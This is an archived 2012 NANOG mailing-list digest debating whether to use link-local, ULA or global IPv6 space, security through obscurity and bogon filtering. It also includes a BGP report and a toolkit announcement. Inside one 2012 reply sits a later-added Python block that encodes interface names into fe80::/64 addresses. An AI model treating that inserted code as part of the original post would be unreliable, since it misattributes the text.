In-Reply-To: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com>
References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com>
Message-ID: <18152610.mKBk0sXnsk@lsdsrv>

On Saturday 14 July 2012 09:18:48 Owen DeLong wrote:
> Given that zone_IDs in my environments consist of terms like:
>
> fxp0
> en0
> eth0
> ge-0/0/0.0
> etc.
>
> How, exactly, would you turn those into part of an IPv6 address?

UTF-8? ASCII? If you go with a custom encoding and do 0-9,a-z, plus a few symbols you can get 6 bits per char for a grand total of 10 chars squeezed into 8 octets.
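To show Oliver's encoding idea in working code, here is an added example written for this edit; it is not Jérôme's or Oliver's code. A 6-bit-per-character alphabet of 0-9, a-z and five symbols packs up to 10 characters of an interface name (Owen's "ge-0/0/0.0" fits exactly) into the 64-bit interface identifier of an fe80::/64 address and decodes it back, and a second helper builds Jérôme's fe80::zone_ID:interface_ID form from two arbitrary 16-bit values. The alphabet, the padding code 0 and the fe80::/64 layout are my assumptions; the example stays inside fe80::/64 because, as Oliver observes, that is what implementations tend to treat as link-local.

```python
import ipaddress

# Custom 6-bit alphabet: 41 symbols, so codes 1..41 fit in 6 bits and code 0
# is free to mean "no character" (padding). Assumption for this example.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz-/._:"
MAX_CHARS = 10                      # 10 chars * 6 bits = 60 bits, inside the 64-bit IID
LINK_LOCAL_PREFIX = 0xfe80 << 112   # assumes the fe80::/64 layout

def encode_ifname(name):
    """Pack an interface name such as 'ge-0/0/0.0' into a 64-bit interface ID.
    Input is lower-cased; a character outside ALPHABET raises ValueError."""
    name = name.lower()
    if not 1 <= len(name) <= MAX_CHARS:
        raise ValueError(f"name must be 1..{MAX_CHARS} characters: {name!r}")
    iid = 0
    for pos in range(MAX_CHARS):
        code = ALPHABET.index(name[pos]) + 1 if pos < len(name) else 0
        iid = (iid << 6) | code
    return iid

def decode_ifname(iid):
    """Inverse of encode_ifname: read ten 6-bit groups, skipping padding."""
    chars = []
    for pos in range(MAX_CHARS):
        code = (iid >> (6 * (MAX_CHARS - 1 - pos))) & 0x3F
        if code:
            chars.append(ALPHABET[code - 1])
    return "".join(chars)

def link_local_for(name):
    """fe80::/64 address whose interface identifier spells the interface name."""
    return ipaddress.IPv6Address(LINK_LOCAL_PREFIX | encode_ifname(name))

def ifname_from_address(addr):
    """Recover the interface name from an address built by link_local_for."""
    return decode_ifname(int(ipaddress.IPv6Address(addr)) & ((1 << 64) - 1))

def link_local_zone(zone_id, iface_id):
    """Jérôme's fe80::zone_ID:interface_ID form with two arbitrary 16-bit values."""
    for value in (zone_id, iface_id):
        if not 0 <= value <= 0xFFFF:
            raise ValueError("zone_id and iface_id must fit in 16 bits")
    return ipaddress.IPv6Address(LINK_LOCAL_PREFIX | (zone_id << 16) | iface_id)

if __name__ == "__main__":
    for ifname in ("fxp0", "en0", "eth0", "ge-0/0/0.0"):
        addr = link_local_for(ifname)
        print(f"{ifname:12} -> {addr}  -> {ifname_from_address(addr)}")
    print(link_local_zone(0x0001, 0x0002))
```

The name-derived addresses are readable in a routing table only after decoding, whereas Jérôme's two-16-bit-value scheme is readable by eye; whichever is chosen, the same interface ID must not be reused on two nodes on one link, since duplicate address detection will reject the second one.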
>
> > Any other address class will work well, but I'd rather not use reserved
> > space outside of GUA, ULA or LLA scopes to avoid bug-hunting on poorly
> > implemented IPv6 stacks.
>
> +1
>
> However, I still think GUA is the best, most flexible choice.

This brings up the question of "what is outside of LLA scope" - to my mind it's everything outside of fe80::/10 - in reality, there's that unfortunate tendency for it to be considered fe80::/64 when it comes down to implementation.

Regards,
Oliver

From bhmccie at gmail.com Sat Jul 14 15:14:45 2012
From: bhmccie at gmail.com (-Hammer-)
Date: Sat, 14 Jul 2012 15:14:45 -0500
Subject: using "reserved" IPv6 space
In-Reply-To:
Message-ID:

Guys,
The whole purpose of this is that they do NOT need to be global. Security thru obscurity. It actually has a place in some worlds. Does that make sense? Or are such V4-centric approaches a bad thing in v6?

On 7/13/12 8:41 PM, "Brandon Ross" wrote:

>On Fri, 13 Jul 2012, Owen DeLong wrote:
>
>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>
>>> keep life simple. use global ipv6 space.
>>>
>>> randy
>>
>> Though it is rare, this is one time when I absolutely agree with Randy.
>
>It's even more rare for me to agree with Randy AND Owen at the same time.
>
>-- 
>Brandon Ross                                      Yahoo & AIM:  BrandonNRoss
>+1-404-635-6667                                                ICQ:  2269442
>Schedule a meeting:  https://tungle.me/bross            Skype:  brandonross
>

From owen at delong.com Sat Jul 14 15:20:32 2012
From: owen at delong.com (Owen DeLong)
Date: Sat, 14 Jul 2012 13:20:32 -0700
Subject: using "reserved" IPv6 space
In-Reply-To:
References:
Message-ID:

They're a bad thing in IPv6.

The only place for security through obscurity IMHO is a small round container that sits next to my desk.

Besides, if you don't advertise it, a GUA prefix is just as obscure as a ULA prefix and provides a larger search space in which one has to hunt for it... Think /3 instead of /8.
Owen

On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:

> Guys,
> The whole purpose of this is that they do NOT need to be global.
> Security thru obscurity. It actually has a place in some worlds. Does that
> make sense? Or are such V4-centric approaches a bad thing in v6?
>
> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>
>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>
>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>
>>>> keep life simple. use global ipv6 space.
>>>>
>>>> randy
>>>
>>> Though it is rare, this is one time when I absolutely agree with Randy.
>>
>> It's even more rare for me to agree with Randy AND Owen at the same time.
>>
>> -- 
>> Brandon Ross                                      Yahoo & AIM:  BrandonNRoss
>> +1-404-635-6667                                                ICQ:  2269442
>> Schedule a meeting:  https://tungle.me/bross            Skype:  brandonross
>>
>

From bhmccie at gmail.com Sat Jul 14 15:22:42 2012
From: bhmccie at gmail.com (-Hammer-)
Date: Sat, 14 Jul 2012 15:22:42 -0500
Subject: using "reserved" IPv6 space
In-Reply-To:
Message-ID:

Thank you all. It's not the protocol that hurts. It's rethinking the culture/philosophy around it.

-Hammer-

On 7/14/12 3:20 PM, "Owen DeLong" wrote:

>They're a bad thing in IPv6.
>
>The only place for security through obscurity IMHO is a small round
>container that sits next to my desk.
>
>Besides, if you don't advertise it, a GUA prefix is just as obscure as a
>ULA prefix and provides a larger search space in which one has to hunt
>for it... Think /3 instead of /8.
>
>Owen
>
>On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:
>
>> Guys,
>> The whole purpose of this is that they do NOT need to be global.
>> Security thru obscurity. It actually has a place in some worlds. Does
>>that
>> make sense? Or are such V4-centric approaches a bad thing in v6?
>>
>> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>>
>>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>>
>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>>
>>>>> keep life simple. use global ipv6 space.
>>>>>
>>>>> randy
>>>>
>>>> Though it is rare, this is one time when I absolutely agree with
>>>>Randy.
>>>
>>> It's even more rare for me to agree with Randy AND Owen at the same
>>>time.
>>>
>>> --
>>> Brandon Ross                                 Yahoo & AIM: BrandonNRoss
>>> +1-404-635-6667                                      ICQ: 2269442
>>> Schedule a meeting: https://tungle.me/bross        Skype: brandonross
>>>
>>
>>
>

From laurent at guerby.net  Sat Jul 14 16:04:23 2012
From: laurent at guerby.net (Laurent GUERBY)
Date: Sat, 14 Jul 2012 23:04:23 +0200
Subject: using "reserved" IPv6 space
In-Reply-To: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com>
References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com>
Message-ID: <1342299863.10346.1971.camel@pc2>

On Sat, 2012-07-14 at 09:18 -0700, Owen DeLong wrote:
> On Jul 14, 2012, at 9:08 AM, Jérôme Nicolle wrote:
>
> > On 13/07/12 16:38, -Hammer- wrote:
> >> In the past, with IPv4, we have used reserved or "non-routable"
> >
> > I guess "non-routable IPv4" translates well to "non-routable IPv6", thus
> > putting Link-Local addresses on top of the list.
> >
> > Though you may use the auto-configured addresses for that purpose, you
> > also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and
> > set such LLA to every gateway to make routing tables more legible,
> > those IDs being arbitrary 16bit values.
> >
>
> Given that zone_IDs in my environments consist of terms like:
>
> fxp0
> en0
> eth0
> ge-0/0/0.0
> etc.
>
> How, exactly, would you turn those into part of an IPv6 address?

Hi,

We use LLA to "virtualize" interconnection to our users:
their network configuration is always static default via fe80::nnnn
and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is
unique per user - if our users want to do some routing, of course.
Since we don't have GUA interconnections we don't have to manage them inside
our AS and we can move user stuff around without having them changing
anything to their static configuration.

We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256
"IP", it's nice to have more than one /64 around for some uses.

Is there any "mass" hoster around that does provide by default a prefix
larger than /64 and that does route it to the user? It's quite simple to
do in IPv6 and we have the address space for it.

Sincerely,

Laurent

From valdis.kletnieks at vt.edu  Sat Jul 14 16:36:52 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Sat, 14 Jul 2012 17:36:52 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: Your message of "Sat, 14 Jul 2012 15:14:45 -0500."
References:
Message-ID: <52169.1342301812@turing-police.cc.vt.edu>

On Sat, 14 Jul 2012 15:14:45 -0500, -Hammer- said:
> The whole purpose of this is that they do NOT need to be global.
> Security thru obscurity. It actually has a place in some worlds. Does that
> make sense? Or are such V4-centric approaches a bad thing in v6?

The fact that your prefix is a Secret Sauce that isn't known to the rest of
the world won't matter much to an attacker. One 'ifconfig' on whatever
beachhead machine the attacker has inside your net, and it's not Secret
Sauce anymore, it's just another bottle of Thousand Island dressing...

From randy at psg.com  Sat Jul 14 16:50:12 2012
From: randy at psg.com (Randy Bush)
Date: Sun, 15 Jul 2012 06:50:12 +0900
Subject: using "reserved" IPv6 space
In-Reply-To: <52169.1342301812@turing-police.cc.vt.edu>
References: <52169.1342301812@turing-police.cc.vt.edu>
Message-ID:

> The fact that your prefix is a Secret Sauce that isn't known to the
> rest of the world won't matter much to an attacker.
> One 'ifconfig' on
> whatever beachhead machine the attacker has inside your net, and it's
> not Secret Sauce anymore, it's just another bottle of Thousand Island
> dressing...

security through obscurity is such tempting koolaid. people fall for it
continually and repeatedly.

i especially like the one where filtering ula at your border is thought to
be any different than filtering a bit of global at your border.

randy

From mysidia at gmail.com  Sat Jul 14 17:37:37 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sat, 14 Jul 2012 17:37:37 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <52169.1342301812@turing-police.cc.vt.edu>
References: <52169.1342301812@turing-police.cc.vt.edu>
Message-ID:

On 7/14/12, valdis.kletnieks at vt.edu wrote:
[snip]
> The fact that your prefix is a Secret Sauce that isn't known to the rest of
> the world won't matter much to an attacker. One 'ifconfig' on whatever
> beachhead machine the attacker has inside your net, and it's not Secret
> Sauce anymore, it's just another bottle of Thousand Island dressing...

The good news is one 'ifconfig' just tells them what network
address you're in.

Unless the attacker can gain access to your host's NDP table or ARP
table, they can't see what IPs are in use.

Your Global or whatever /64 has ~18446744073709551615 possible IP addresses.

If you want your addressing assignments to be "obscure", generate a
random interface ID, and use that to assign your IPv6 addresses within
your public /64, or just use stateless autoconfig.

--
-JH

From alh-ietf at tndh.net  Sat Jul 14 17:45:06 2012
From: alh-ietf at tndh.net (Tony Hain)
Date: Sat, 14 Jul 2012 15:45:06 -0700
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <52169.1342301812@turing-police.cc.vt.edu>
Message-ID: <03b201cd6212$520ab820$f6202860$@tndh.net>

Randy Bush wrote:
> > The fact that your prefix is a Secret Sauce that isn't known to the
> > rest of the world won't matter much to an attacker.
> > One 'ifconfig' on
> > whatever beachhead machine the attacker has inside your net, and it's
> > not Secret Sauce anymore, it's just another bottle of Thousand Island
> > dressing...
>
> security through obscurity is such tempting koolaid. people fall for it
> continually and repeatedly.

Some people have different Layer 8-9 requirements than others. I am not
saying they are 'right', just that 'easier' is a relative term based on
what part of the problem is generating the most heat at the moment.

>
> i especially like the one where filtering ula at your border is thought to be any
> different than filtering a bit of global at your border.

There is no difference in the local filtering function, but *IF* all transit
providers put FC00::/7 in bogon space and filter it at every border, there
is a clear benefit when someone fat-fingers the config script and announces
what should be a locally filtered prefix (don't we routinely see unintended
announcements in the global BGP table). I realize that is a big IF, but
bogon filtering happens fairly consistently in IPv4, so there is no reason
to believe it will be less so in IPv6.

Tony

From owen at delong.com  Sat Jul 14 19:02:07 2012
From: owen at delong.com (Owen DeLong)
Date: Sat, 14 Jul 2012 17:02:07 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <1342299863.10346.1971.camel@pc2>
References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2>
Message-ID: <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com>

On Jul 14, 2012, at 2:04 PM, Laurent GUERBY wrote:

> On Sat, 2012-07-14 at 09:18 -0700, Owen DeLong wrote:
>> On Jul 14, 2012, at 9:08 AM, Jérôme Nicolle wrote:
>>
>>> On 13/07/12 16:38, -Hammer- wrote:
>>>> In the past, with IPv4, we have used reserved or "non-routable"
>>>
>>> I guess "non-routable IPv4" translates well to "non-routable IPv6", thus
>>> putting Link-Local addresses on top of the list.
>>> >>> Thought you may use th auto-configured addresses for that purpose, you >>> also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and >>> set such LLA to every gateways to make routing tables more legible, >>> those ID beeing arbitrary 16bit values. >>> >> >> Given that zone_IDs in my environments consist of terms like: >> >> fxp0 >> en0 >> eth0 >> ge-0/0/0.0 >> etc. >> >> How, exactly, would you turn those into part of an IPv6 address? > > Hi, > > We use LLA to "virtualize" interconnection to our users: > their network configuration is always static default via fe80::nnnn > and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is > unique per user - if our user want to do some routing of course. Since > we don't have GUA interconnections we don't have to manage them inside > our AS and we can move user stuff around without having them changing > anything to their static configuration. > > We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 > "IP", it's nice to have more than one /64 around for some uses. > > Is there any "mass" hoster around that does provide by default a pefix > larger than /64 and that does route it to the user? It's quite simple to > do in IPv6 and we have the address space for it. > > Sincerely, > > Laurent Why not just give each end-site a /48? An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. 
Owen From randy at psg.com Sat Jul 14 20:41:44 2012 From: randy at psg.com (Randy Bush) Date: Sun, 15 Jul 2012 10:41:44 +0900 Subject: using "reserved" IPv6 space In-Reply-To: <03b201cd6212$520ab820$f6202860$@tndh.net> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> Message-ID: >> i especially like the one where filtering ula at your border is >> thought to be any different than filtering a bit of global at your >> border. > There is no difference in the local filtering function, but *IF* all transit > providers put FC00::/7 in bogon space and filter it at every border and this works so well with rfc 1918 space and other v4 bogons. not. randy From rs at seastrom.com Sat Jul 14 20:48:49 2012 From: rs at seastrom.com (Robert E. Seastrom) Date: Sat, 14 Jul 2012 21:48:49 -0400 Subject: using "reserved" IPv6 space In-Reply-To: (bhmccie@gmail.com's message of "Sat, 14 Jul 2012 15:22:42 -0500") References: Message-ID: <86a9z1hjzy.fsf@seastrom.com> Actually, that's one of the most insightful meta-points I've seen on NANOG in a long time. There is a HUGE difference between IPv4 and IPv6 thinking. We've all been living in an austerity regime for so long that we've completely forgotten how to leave parsimony behind. Even those of us who worked at companies that were summarily handed a Class B when we mumbled something about "internal subnetting" have a really hard time remembering how to act when we suddenly don't have to answer for every single host address and can design a network to conserve other things (like our brain cells). -r -Hammer- writes: > > > Thank you all. It's not the protocol that hurts. It's rethinking the > culture/philosophy around it. > > -Hammer- > > On 7/14/12 3:20 PM, "Owen DeLong" wrote: > >>They're a bad thing in IPv6. >> >>The only place for security through obscurity IMHO is a small round >>container that sits next to my desk. 
>>
>>Besides, if you don't advertise it, a GUA prefix is just as obscure as a
>>ULA prefix and provides a larger search space in which one has to hunt
>>for it... Think /3 instead of /8.
>>
>>Owen
>>
>>On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:
>>
>>> Guys,
>>> The whole purpose of this is that they do NOT need to be global.
>>> Security thru obscurity. It actually has a place in some worlds. Does
>>>that
>>> make sense? Or are such V4-centric approaches a bad thing in v6?
>>>
>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>>>
>>>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>>>
>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>>>
>>>>>> keep life simple. use global ipv6 space.
>>>>>>
>>>>>> randy
>>>>>
>>>>> Though it is rare, this is one time when I absolutely agree with
>>>>>Randy.
>>>>
>>>> It's even more rare for me to agree with Randy AND Owen at the same
>>>>time.
>>>>
>>>> --
>>>> Brandon Ross                                 Yahoo & AIM: BrandonNRoss
>>>> +1-404-635-6667                                      ICQ: 2269442
>>>> Schedule a meeting: https://tungle.me/bross        Skype: brandonross
>>>>
>>>
>>>
>>

From cidr-report at potaroo.net  Fri Jul 13 17:04:32 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 13 Jul 2012 22:04:32 GMT
Subject: BGP Update Report
Message-ID: <201207132204.q6DM4W9r047678@wattle.apnic.net>

BGP Update Report
Interval: 05-Jul-12 -to- 09-Jul-12 (4 days)
Observation Point: BGP Peering with AS131072

TOP 20 Unstable Origin AS
TOP 20 Unstable Origin AS (Updates per announced prefix)
TOP 20 Unstable Prefixes

Details at http://bgpupdates.potaroo.net

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org

From laurent at guerby.net  Sun Jul 15 02:50:39 2012
From: laurent at guerby.net (Laurent GUERBY)
Date: Sun, 15 Jul 2012 09:50:39 +0200
Subject: using "reserved" IPv6 space
In-Reply-To: <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com>
References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com>
Message-ID: <1342338639.10346.1981.camel@pc2>

Hi,

On Sat, 2012-07-14 at 17:02 -0700, Owen DeLong wrote:
> > Hi,
> >
> > We use LLA to "virtualize" interconnection to our users:
> > their network configuration is always static default via fe80::nnnn
> > and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is
> > unique per user - if our user want to do some routing of course. Since
> > we don't have GUA interconnections we don't have to manage them inside
> > our AS and we can move user stuff around without having them changing
> > anything to their static configuration.
> > > > We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 > > "IP", it's nice to have more than one /64 around for some uses. > > > > Is there any "mass" hoster around that does provide by default a pefix > > larger than /64 and that does route it to the user? It's quite simple to > > do in IPv6 and we have the address space for it. > Why not just give each end-site a /48? We give a /48 on request, a /56 by default (and we never give a /64). > An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. The /56 subnets we give are for single machine in a rack, virtual machine in a cluster or home router. http://www.tunnelbroker.net/ gives by default /64 to a home router and /48 on request we just decided to give /56 by default and /48 on request. Sorry if I wasn't clear in my first message. Is there an agreed upon definition of "end site"? Sincerely, Laurent From bmanning at vacation.karoshi.com Sun Jul 15 02:58:44 2012 From: bmanning at vacation.karoshi.com (bmanning at vacation.karoshi.com) Date: Sun, 15 Jul 2012 07:58:44 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <1342338639.10346.1981.camel@pc2> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> <1342338639.10346.1981.camel@pc2> Message-ID: <20120715075844.GA26100@vacation.karoshi.com.> On Sun, Jul 15, 2012 at 09:50:39AM +0200, Laurent GUERBY wrote: > Sorry if I wasn't clear in my first message. > > Is there an agreed upon definition of "end site"? > > Sincerely, > > Laurent this might help. seems like these folks have general agreement on terms. 
NANOG-critters might have different points of view. http://www.cio.gov/documents/2012_IPv6_Roadmap_FINAL_20120712.pdf /bill From Grzegorz at Janoszka.pl Sun Jul 15 04:38:46 2012 From: Grzegorz at Janoszka.pl (Grzegorz Janoszka) Date: Sun, 15 Jul 2012 11:38:46 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <03b201cd6212$520ab820$f6202860$@tndh.net> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> Message-ID: <50028FA6.3040803@Janoszka.pl> On 2012-07-15 00:45, Tony Hain wrote: > There is no difference in the local filtering function, but *IF* all transit > providers put FC00::/7 in bogon space and filter it at every border, there > is a clear benefit when someone fat-fingers the config script and announces > what should be a locally filtered prefix (don't we routinely see unintended > announcements in the global BGP table). I realize that is a big IF, but There was also in the past fec0::/10. For BGP updates you should be safe to filter out FC00::/6. -- Grzegorz Janoszka From owen at delong.com Sun Jul 15 05:13:59 2012 From: owen at delong.com (Owen DeLong) Date: Sun, 15 Jul 2012 03:13:59 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342338639.10346.1981.camel@pc2> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> <1342338639.10346.1981.camel@pc2> Message-ID: <03F2C9B5-A7BB-44A3-AC17-A1AD72251AC1@delong.com> On Jul 15, 2012, at 12:50 AM, Laurent GUERBY wrote: > Hi, > > On Sat, 2012-07-14 at 17:02 -0700, Owen DeLong wrote: >>> Hi, >>> >>> We use LLA to "virtualize" interconnection to our users: >>> their network configuration is always static default via fe80::nnnn >>> and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is >>> unique per user - if our user want to do some routing of course. 
Since >>> we don't have GUA interconnections we don't have to manage them inside >>> our AS and we can move user stuff around without having them changing >>> anything to their static configuration. >>> >>> We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 >>> "IP", it's nice to have more than one /64 around for some uses. >>> >>> Is there any "mass" hoster around that does provide by default a pefix >>> larger than /64 and that does route it to the user? It's quite simple to >>> do in IPv6 and we have the address space for it. > >> Why not just give each end-site a /48? > > We give a /48 on request, a /56 by default (and we never give a /64). > >> An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. > > The /56 subnets we give are for single machine in a rack, virtual > machine in a cluster or home router. > > http://www.tunnelbroker.net/ gives by default /64 to a home router > and /48 on request we just decided to give /56 by default > and /48 on request. > > Sorry if I wasn't clear in my first message. > > Is there an agreed upon definition of "end site"? > Not exactly, but, there is now an ARIN definition for ARIN address policy. An end site (IIRC since I wrote the ARIN definition) is a single building or structure or a single tenant in a multi-tenant building or structure. So, if you have a university campus with 23 buildings, that might be 23 end sites. However, if one of them is a dormitory which has 100 rental units, that would up the end-site count to 122. If one of those buildings houses the math department, the physics department, and the science department, that might bring the total up as high as 124. Make sense? 
Owen

From pl+list at pmacct.net  Sun Jul 15 07:16:58 2012
From: pl+list at pmacct.net (Paolo Lucente)
Date: Sun, 15 Jul 2012 12:16:58 +0000
Subject: Real world sflow vs netflow?
In-Reply-To: <50012E21.4060802@bromirski.net>
References: <50012E21.4060802@bromirski.net>
Message-ID: <20120715121658.GA13696@moussaka.pmacct.net>

On Sat, Jul 14, 2012 at 10:30:25AM +0200, Łukasz Bromirski wrote:
> NetFlow supports [ .. ] As well as L2 traffic (v9) [ .. ]

Let's be real and speak implementations: where is L2 information in
NetFlow for routed traffic on bigger platforms typically thrown for
peering at internet exchanges - ASR9K, C7600 (i.e. hopefully without
having to invest more money in such a platform to upgrade to Sup2T), MX,
CRS?

Cheers,
Paolo

PS: Let's not return to the point of availability of MAC accounting,
since that is not the solution.

From swm at emanon.com  Sun Jul 15 08:30:29 2012
From: swm at emanon.com (Scott Morris)
Date: Sun, 15 Jul 2012 09:30:29 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <50028FA6.3040803@Janoszka.pl>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl>
Message-ID: <5002C5F5.4040505@emanon.com>

On 7/15/12 5:38 AM, Grzegorz Janoszka wrote:
> On 2012-07-15 00:45, Tony Hain wrote:
>> There is no difference in the local filtering function, but *IF* all transit
>> providers put FC00::/7 in bogon space and filter it at every border, there
>> is a clear benefit when someone fat-fingers the config script and announces
>> what should be a locally filtered prefix (don't we routinely see unintended
>> announcements in the global BGP table). I realize that is a big IF, but
> There was also in the past fec0::/10. For BGP updates you should be safe
> to filter out FC00::/6.
>
Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So
while FE00::/7 may yet be unallocated, I don't think I'd set filters in
that fashion.
Reasonably, wouldn't it be more likely to permit BGP advertisements
within the 2000::/3 range as that's the "active" space currently?


Scott

From cb.list6 at gmail.com  Sun Jul 15 09:02:22 2012
From: cb.list6 at gmail.com (Cameron Byrne)
Date: Sun, 15 Jul 2012 07:02:22 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <5002C5F5.4040505@emanon.com>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com>
Message-ID:

On Jul 15, 2012 9:30 AM, "Scott Morris" wrote:
>
> On 7/15/12 5:38 AM, Grzegorz Janoszka wrote:
> > On 2012-07-15 00:45, Tony Hain wrote:
> >> There is no difference in the local filtering function, but *IF* all transit
> >> providers put FC00::/7 in bogon space and filter it at every border, there
> >> is a clear benefit when someone fat-fingers the config script and announces
> >> what should be a locally filtered prefix (don't we routinely see unintended
> >> announcements in the global BGP table). I realize that is a big IF, but
> > There was also in the past fec0::/10. For BGP updates you should be safe
> > to filter out FC00::/6.
> >
>
> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So
> while FE00::/7 may yet be unallocated, I don't think I'd set filters in
> that fashion.
>
> Reasonably, wouldn't it be more likely to permit BGP advertisements
> within the 2000::/3 range as that's the "active" space currently?
>
>
> Scott
>
>

Yep. That's what we do, permit 2000::/3, with a deny statement for the
documentation range and small prefixes.

CB

From fernando at gont.com.ar  Sun Jul 15 09:56:03 2012
From: fernando at gont.com.ar (Fernando Gont)
Date: Sun, 15 Jul 2012 15:56:03 +0100
Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo
Message-ID: <5002DA03.6060007@gont.com.ar>

Folks,

I've posted a snapshot (tarball) of my working copy of the IPv6 toolkit.
The tarball is available at:

Additionally, I've created a git repository for the toolkit, such that
collaboration is improved. The git repo is available at:

If you have access to a Mac OS box, please try to compile the tools, and
let me know if you find any errors (or let me know if they compiled
cleanly). If you can also run the tools according to some of the examples
in the manuals (and report any problems), that would be great, too.

P.S.: If you've sent patches and your patches have not yet been applied,
most likely it just means that I'm catching up with them (feel free to
resend!).

Thanks!

Best regards,
--
Fernando Gont
e-mail: fernando at gont.com.ar || fgont at si6networks.com
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From rbf+nanog at panix.com  Sun Jul 15 10:28:50 2012
From: rbf+nanog at panix.com (Brett Frankenberger)
Date: Sun, 15 Jul 2012 10:28:50 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <86a9z1hjzy.fsf@seastrom.com>
References: <86a9z1hjzy.fsf@seastrom.com>
Message-ID: <20120715152850.GA11988@panix.com>

On Sat, Jul 14, 2012 at 09:48:49PM -0400, Robert E. Seastrom wrote:
>
> Actually, that's one of the most insightful meta-points I've seen on
> NANOG in a long time.
>
> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
> been living in an austerity regime for so long that we've completely
> forgotten how to leave parsimony behind.
> Even those of us who worked
> at companies that were summarily handed a Class B when we mumbled
> something about "internal subnetting" have a really hard time
> remembering how to act when we suddenly don't have to answer for every
> single host address and can design a network to conserve other things
> (like our brain cells).

Addresses no longer being scarce is a significant shift, but this thread
is about a lot more than that. I didn't get the feeling that the original
poster was wanting to use non-global addresses on his internal links
because he was concerned about running out. He also wanted to do so for
purposes of security. And that's not a paradigm shift between v4 and v6.
Obscurity / non-global address "magic" was pretend security in v4 and
it's pretend security in v6.

People who used RFC1918 space where they didn't need global uniqueness in
v4 often did so initially because of scarcity (and were often making a
completely reasonable decision in doing so), but they then falsely imputed
a security benefit to that. If we can leverage the v6 migration to get
out of the thinking that some addresses are magically more secure than
others, then that's probably a win, but it's not a fundamental difference
between v4 and v6. It's not that correct IPv4 thinking is "1918 is more
